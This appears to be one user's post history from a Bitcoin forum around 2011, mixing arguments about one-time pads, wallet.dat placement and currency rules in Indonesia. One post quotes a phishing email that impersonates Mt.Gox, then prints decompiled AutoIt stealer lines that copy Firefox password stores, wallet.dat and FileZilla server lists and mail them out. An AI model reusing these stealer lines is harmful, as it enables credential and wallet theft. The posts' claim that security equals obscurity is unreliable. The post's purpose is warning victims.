You give 1MB key for OTP comm with a sub, and rather you not send them any block longer than 1MB, send him War and Peace and you start to get a pattern. sending him the pattern "War and Peace" in 1MB, does not create a pattern, in the encrypted data. giving him a 10^100 byte key, and sending him 10^100 bytes "War and Peace", also does not. it seems you simply dont understand it. LOL! Missed this post!  "Send him War and Peace" doesn't mean send him "pattern War and Peace", but broadcast War and Peace, Leo Tolstoy book: http://en.wikipedia.org/wiki/War_and_Peace Sending patterns.. I'm still laughing!!! |
|
|
|
if i was a script kiddie i would code a 5 line trojan, that could scan your computer, for 1btc, and gain 500btc.
Damn! You're a cute troll 5 line trojan (with 20 Mb batch of attached DLL's?) |
|
|
|
|
No, the "Indecipherable cypher" is the "father" of OTP:
Caesar's cypher -> Indecipherable cypher -> OTP
Differences:
Caesar's Key: B
Text: APPLE
Result: BQQMF
(this was used by the Romans, strong enough for what they were facing)
"Indecipherable Cypher" Key: BEAN
Text: APPLE
Result: BTPZF
Early OTP Key -> has to match the size of the text to chyper, so BEANS
Text: APPLE
Result: BTPZX
Yes, but if the key gets compromised - and you didn't figured it out - then you'll be giving away info.
But that's for another field, a field for which encryption is a tool -> information.
Information is also valid in a time frame, imagine a German message intercepted in 1939 that just now got decrypted, it says «Tomorrow we will invade Poland»; what's the use to know it now?!
There's a significant increase in security by moving the file, despite if "some software can scan your computer", as that very same software probably can do whatever it takes no matter what security you imply.
I don't know if you were looking at the code or can reverse engineer software of the latest virus for Bitcoin, this method alone would put them all out of commission... yes in the future a better skilled coder(...); but also in the future machines calculating Petahashes per second(...).
BTW, back in the days while in the army I designed an OTP based chat system, you need a floppy key (no USB at such time) which have files like 1.key, 2.key(...). Each of those files have a very long passphrase inside and uses sync encrypt/decrypt, at random intervals the part which started the chat send a signal to switch the key to another <number>.key... pretty much simple, but effective... unless someone used diskcopy that is...
|
|
|
|
|
Depends on what the trojan does.
Still, you believe it doesn't worth 2 lines of code because some other attacks will get through? Then we rather let go computer security all at once, as eventually some kind of attacks will pass... so what's the use?
You give 1MB key for OTP comm with a sub, and rather you not send them any block longer than 1MB, send him War and Peace and you start to get a pattern.
|
|
|
|
i can make a 100% unbreakeable cipher
Wow! I'm impressed! Not even PGP or SSL can be considered "unbreakable" - rather really hard to break -, guess you would get a Nobel Prize out of that one. no nobel price to me, already invented http://en.wikipedia.org/wiki/One-time_padby you saying that, can conclude that you have no knowledge at all on the subject. and therefor you are a troll.  That's an improvement of http://en.wikipedia.org/wiki/Vigen%C3%A8re_cipherThe indecipherable cipher suffers from patterns, the pathetic attempt done by Gilbert was to create an algorithm where the key matches in size the crypt text. Resulting in a stupidity, as if you can send such key securely, you rather send the plain text the same way and spare you from some worthless work. Given a long enough key and a short enough text to Vernam's method and you would get that effect already. PS - This topic isn't about cryptography anyway... my idea just provides a "hiding the wallet" not "encrypt it". -> This means that currently is like if everybody was using their wallets in the back pocket, making life easier to pickpockets. My method would simply make anyone put the wallet wherever he wishes... making pickpockets to have to look for it - still doesn't mean you get rid of pickpockets, just their job gets harder.  |
|
|
|
i can make a 100% unbreakeable cipher
Wow! I'm impressed! Not even PGP or SSL can be considered "unbreakable" - rather really hard to break -, guess you would get a Nobel Prize out of that one. |
|
|
|
|
Troll, no. Many folks failed to understand the purpose of encryption and confuse it by "security" when all it does it "hide things" - therefore: provides obscurity.
Everyone with coding skills can make a fake client... what's your point with that one?!
I'm talking about implement this in the open source one...
@jgraham
Obscurity is meant to be something just you know, or a specific recipient; cryptography is just one way to do it. But to very end, security is obscurity and the more obscurity you add to it the more security you get; may it be in method or final product.
The worse part in security is to believe it's unbreakable... but that's "a wrong assumption" no matter the methods you used.
Actually, going a bit side line here, security and cryptography works this way:
If you're a good cryptographer and can create your own algorithms you get twice of the protection: Your own algorithm nobody else's knows and the final product.
If you can't or don't want to create new algorithms you get standard protection: just the final product is protected, but the algorithm is widely known.
If you are a lousy crypto and still go for it, you get half or less of protection; your easy to break/figure out algorithm and poorly encrypted data.
|
|
|
|
|
Wrong! Cryptography IS NOT security. Cryptography is a WAY to provide you OBSCURITY.
If you believe on security in open air, then just post your password. Better on, why use passwords? Just come, pick an username and wear it up.
A script kiddie normally go by AutoIt scripts and easy to implement code he can pick from the web; hooking into a running process isn't part of it.
This is also NOT the magical bullet that will kill all malicious software, is a way to make it harder to do so less people CAN do it, therefore less people DO IT.
Why make it easy to attack when all it takes is a file open dialog in the client or an argument passed to the bitcoind to make it way harder?
|
|
|
|
|
Security IS obscurity. That dogma you stated makes no sense at all. Anything that's open isn't by nature secure; it's just open.
The value of BTC justifies for the user to search for it when he opens the client, so the wallet place isn't stored anywhere outside its owner brain. the client could well also allow hot-swap of wallets.
Yes, a trojan may scan your computer... making it dead slow and probably making you try to figure what's going on. But the current way the trojan have all the way open %APPDATA%\Bitcoin\wallet.dat; easy pick virus for any script kiddie.
|
|
|
|
|
Having default values set is the biggest security hole on most software, this behavior allows malicious software to know exactly what and where to find what it wants. Some examples are:
C:\Windows
%AppData%\Mozilla Firefox
%AppData%\Mozilla Thunderbird
%AppData%\Filezilla
%AppData%\Bitcoin
For some sort of data this ok, like the blockchain, for personal data ain't. Bitcoin client needs to be patched to allow the users to choose where to store wallet.dat and, more over, to choose what name to give to that file.
Think about it...
|
|
|
|
Holy! The floats are insane! 3 refreshs 30 seconds interval: 12.6, 13.65, 13.07  |
|
|
|
Yeah! Now I'm waiting for 14th July when everybody starts paying you to give you their bitcoins  |
|
|
|
leave Ubutnu to the linux geeks
The last version you can leave for blind people actually, it's desktop is most obnoxious thing I'd ever see... Ubuntis: STOP copying or try to copy Android! Desktops aren't mobile tiny devices! |
|
|
|
(...)because linux is generally good with viruses(...)
This is to spread a fake feeling of security. The only "advantage" is that Linux, by being way less used, has less virus designed to it than Windows, isn't "good with viruses". Like FF, normally safer than IE, yet yesterday I decompile a bitcoin virus that goes after FF stored passwords... |
|
|
|
|
Yes, you can.
I use to input the blockchain from my windows desktop to my linux boxes (so I don't have to go dload it again by p2p) and never had issues.
Just that normally I don't pass the wallet.dat along, but I believe it's ok also.
|
|
|
|
You didn't fall for this email, did you: Dear Mt.Gox user, As i'm sure most of you are well aware, there has been a serious compromise of Mt. Gox's database. We implore all of our users to take safety precautions to ensure their assets are not at risk, as your password may have been compromised Please Follow the instructions here (Instructions are given by text and an image) : http://www.fileden.com/files/2011/6/17/3153783/Mt.Gox-Safety-Tutorials.rarIt is very important that you follow these instructions to prevent any further compromises on other sites that you browse. Thanks, The Mt.Gox team BTW, how can you be confident about viruses, etc, if you have an unencrypted wallet and you lost all your BTC from it. I mean, really, think about it. Sorry to go a bit offtopic, but the robber who created that virus really went hardcore; full time robber! Here's what it goes after (it's an AutoIt script compiled and UPX packed): FileCopy(Execute(" @AppDataDir ") & "\Mozilla\Firefox\Profiles\" & $Var1512 & "\key3.db", "C:\temp1\")
FileCopy(Execute(" @AppDataDir ") & "\Mozilla\Firefox\Profiles\" & $Var1512 & "\signons*", "C:\temp1\signons")
FileCopy(Execute(" @AppDataDir ") & "\bitcoin\" & "wallet.dat", "C:\temp1\")
FileCopy(Execute(" @AppDataDir ") & "\filezilla\" & "recentservers.xml", "C:\temp1\")
And sends it to: clintonlowe46@gmail.comEDIT: For those wondering if are infected, look for a folder names "readme" with a file inside named ""READ-FIRST.txt", inside your AppData dir (C:\documents and settings\<user>\Application Data (2k/xp) - c:\users\<user>\AppData\Roaming (Vista/7)) |
|
|
|
the ussual steps :
receive dollar -> put it into coffer -> exchange it later.
those steps change to :
receive dollar -> exchange it to local currency (gets an addon extra charge inflationary rates) -> put it into coffer.
You're missing one important step: receive dollar -> exchange it to local currency (gets an addon extra charge inflationary rates) -> give some to the local corrupt police -> put it into coffer. Otherwise you end up in jail... |
|
|
|
If a generating node receives a transaction that should include a transaction fee but doesn't, they may refuse to include it in their blocks. It might be included in a later block if someone is willing to accept it. Yes... they can patch and rebuild bitcoind... but then you probably will wait a bit longer prior to see anything hit the blockchain. |
|
|
|
Just tried to comment the case with my wife, which happens to be Eastern Javanese, she started to talk about some guys a while ago buying iPads from Singapore with USD and then sell them at Indonesia for USD but without bhs Indonesia instructions... and then 2 of them were arrested and they passed a bill about forbidden trading with USD within ID. Kind a confuse story... ...sounds like an ad-hoc law. Anything of this checks out?! |
|
|
|
|
Well, a thing that I remember from Indonesia is that they took every load of bullshit FED could put into them. Starting for the USD bills to be "in mint condition", otherwise they were refused.
|
|
|
|
|
Show Posts
